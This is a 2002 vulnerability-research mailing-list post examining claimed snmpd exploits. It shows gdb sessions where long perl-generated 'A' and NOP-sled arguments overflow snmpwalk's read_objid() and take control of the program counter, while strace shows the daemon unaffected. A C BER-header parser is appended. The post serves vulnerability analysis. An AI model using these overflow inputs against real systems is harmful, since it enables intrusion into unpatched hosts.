Vulnerability Development mailing list archives
snmpd exploit examination - snmpwalk
From: KF <dotslash () snosoft com>
Date: Wed, 20 Feb 2002 16:14:50 -0500
I am not so sure about those proof of concept remote snmp exploits that were posted... they look more like local exploits to me.

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1 17 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

(gdb) r 127.0.0.1 public `perl -e 'print "A" x 293'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'`

Program received signal SIGSEGV, Segmentation fault.
0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
(gdb) bt
#0  0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
#1  0x0ff99358 in snmp_parse_oid () from /usr/lib/libsnmp-0.4.2.1.so
#2  0x10000e28 in _init ()
#3  0x0fc6eb90 in __libc_start_main () from /lib/libc.so.6

(gdb) r 127.0.0.1 public `perl -e 'print "A" x 308'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 308'`

Program received signal SIGILL, Illegal instruction.
0x41414100 in ?? ()

(gdb) r 127.0.0.1 public `perl -e 'print "A" x 309'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`

Program received signal SIGILL, Illegal instruction.
0x41414140 in ?? ()

This is snmpwalk NOT snmpd dying...

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  5 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

Still running...

OK, let's use a newer version of snmpwalk

[root@linuxppc ucd-snmp-4.2.2]# apps/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: Unknown Object Identifier (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  4 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

still running...

These are the examples I have seen in various emails as methods to exploit snmpd... These seem to do nothing on my box to the client or the daemon...

snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);
execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);

Here are my results.

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c `perl -e 'print "A" x 256'`
Timeout: No Response from 127.0.0.1
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 450'`
Timeout: No Response from 127.0.0.1
[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 `perl -e 'print "A" x 4050'`
Timeout: No Response from 127.0.0.1

Additional findings.

[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 public `perl -e 'print "A" x 4050'`
Segmentation fault
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c public `perl -e 'print "A" x 4050'`
Segmentation fault

Meanwhile the daemon reads the requests with no problems...

[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238429, 731763}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238430, 739274}, NULL) = 0

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 3999'`
Timeout: No Response from 127.0.0.1

[0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037
[0fc142b4] gettimeofday({1014238568, 885323}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037

Give it too many chars and snmpwalk complains.

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'`
snmpwalk: Error building ASN.1 representation

Again YOUR results may vary ... these are mine.

-KF
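The strace lines in the post show the daemon receiving properly framed SNMPv1 messages in which the oversized argument travels as the community string: in each quoted recvfrom() prefix, the outer SEQUENCE length plus its 4-byte header equals the 494 or 4037 bytes recvfrom() returned, and the OCTET STRING length gives the community size. The program below is an added example, not code from KF's post or from the ucd-snmp code base: a small BER length decoder plus an SNMPv1 header parser that checks the framing against the datagram size. The two byte prefixes are transcribed from the strace output; everything after them (the community body and the GetNext PDU) was not printed by strace and is filled with 0x90 here as an assumption, and the function and constant names (parse_snmp_hdr, build_sample, PREFIX_494, PREFIX_4037) are ours.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Fields recovered from the front of an SNMPv1 message:
 *   SEQUENCE { INTEGER version, OCTET STRING community, PDU ... } */
struct snmp_hdr {
    size_t msg_len;        /* length carried in the outer SEQUENCE header */
    size_t total_len;      /* SEQUENCE header bytes + msg_len = implied datagram size */
    long   version;        /* 0 = SNMPv1 */
    size_t community_len;  /* length of the community OCTET STRING */
};

/* Decode one BER length field at buf[*pos]: short form (< 0x80) or long form
 * (0x80|N followed by N big-endian bytes). Returns 0 on truncation, on the
 * indefinite form (0x80) and on lengths wider than size_t. */
static int ber_len(const uint8_t *buf, size_t n, size_t *pos, size_t *out)
{
    if (*pos >= n) return 0;
    uint8_t b = buf[(*pos)++];
    if (b < 0x80) { *out = b; return 1; }
    size_t nb = b & 0x7f;
    if (nb == 0 || nb > sizeof(size_t) || nb > n - *pos) return 0;
    size_t v = 0;
    for (size_t i = 0; i < nb; i++) v = (v << 8) | buf[(*pos)++];
    *out = v;
    return 1;
}

/* Parse the message header. Returns 0 on success, -1 on malformed BER, and
 * -2 when the SEQUENCE length disagrees with the bytes actually received
 * (truncated datagram or trailing garbage). */
int parse_snmp_hdr(const uint8_t *buf, size_t n, struct snmp_hdr *h)
{
    size_t pos = 0, len;
    memset(h, 0, sizeof *h);
    if (n < 1 || buf[pos++] != 0x30) return -1;                 /* SEQUENCE */
    if (!ber_len(buf, n, &pos, &len)) return -1;
    h->msg_len = len;
    if (len > n - pos) return -2;
    h->total_len = pos + len;
    if (h->total_len != n) return -2;
    if (pos >= n || buf[pos++] != 0x02) return -1;              /* INTEGER version */
    if (!ber_len(buf, n, &pos, &len) || len == 0 || len > sizeof(long) || len > n - pos) return -1;
    long v = 0;
    for (size_t i = 0; i < len; i++) v = (v << 8) | buf[pos++];
    h->version = v;
    if (pos >= n || buf[pos++] != 0x04) return -1;              /* OCTET STRING community */
    if (!ber_len(buf, n, &pos, &len) || len > n - pos) return -1;
    h->community_len = len;
    return 0;
}

/* Prefixes transcribed from the two recvfrom() lines in the strace output
 * (strace printed only the first bytes of each datagram). */
const uint8_t PREFIX_494[]  = {0x30,0x82,0x01,0xea, 0x02,0x01,0x00, 0x04,0x82,0x01,0xc8};
const uint8_t PREFIX_4037[] = {0x30,0x82,0x0f,0xc1, 0x02,0x01,0x00, 0x04,0x82,0x0f,0x9f};

/* Reconstruct a datagram of `total` bytes (the value recvfrom() returned):
 * the transcribed prefix followed by 0x90 filler. The filler is our
 * assumption; the community body and the PDU after it were never printed. */
size_t build_sample(const uint8_t *prefix, size_t plen, size_t total, uint8_t *out, size_t cap)
{
    if (plen > total || total > cap) return 0;
    memcpy(out, prefix, plen);
    memset(out + plen, 0x90, total - plen);
    return total;
}

int main(void)
{
    uint8_t buf[4096];
    struct snmp_hdr h;
    size_t n = build_sample(PREFIX_494, sizeof PREFIX_494, 494, buf, sizeof buf);
    if (parse_snmp_hdr(buf, n, &h) == 0)
        printf("494-byte datagram: SNMPv%ld, SEQUENCE len %zu, community %zu bytes\n",
               h.version + 1, h.msg_len, h.community_len);
    n = build_sample(PREFIX_4037, sizeof PREFIX_4037, 4037, buf, sizeof buf);
    if (parse_snmp_hdr(buf, n, &h) == 0)
        printf("4037-byte datagram: SNMPv%ld, SEQUENCE len %zu, community %zu bytes\n",
               h.version + 1, h.msg_len, h.community_len);
    /* Hand over only part of the datagram: the length check reports truncation. */
    printf("first 200 bytes only -> %d\n", parse_snmp_hdr(buf, 200, &h));
    return 0;
}
```

Run as is, it decodes community lengths of 456 and 3999 bytes, the second matching the `"\x90" x 3999` run quoted just before that capture, and both datagrams pass the framing check. That is consistent with KF's reading of the thread: the segfaults and the 0x41414100 PC are in snmpwalk's read_objid() chewing on the OID argument from argv, while what reaches snmpd is a valid SNMPv1 GetNext with a long community string that the daemon keeps reading without complaint; at 5000 bytes the client refuses to encode the message at all ("Error building ASN.1 representation").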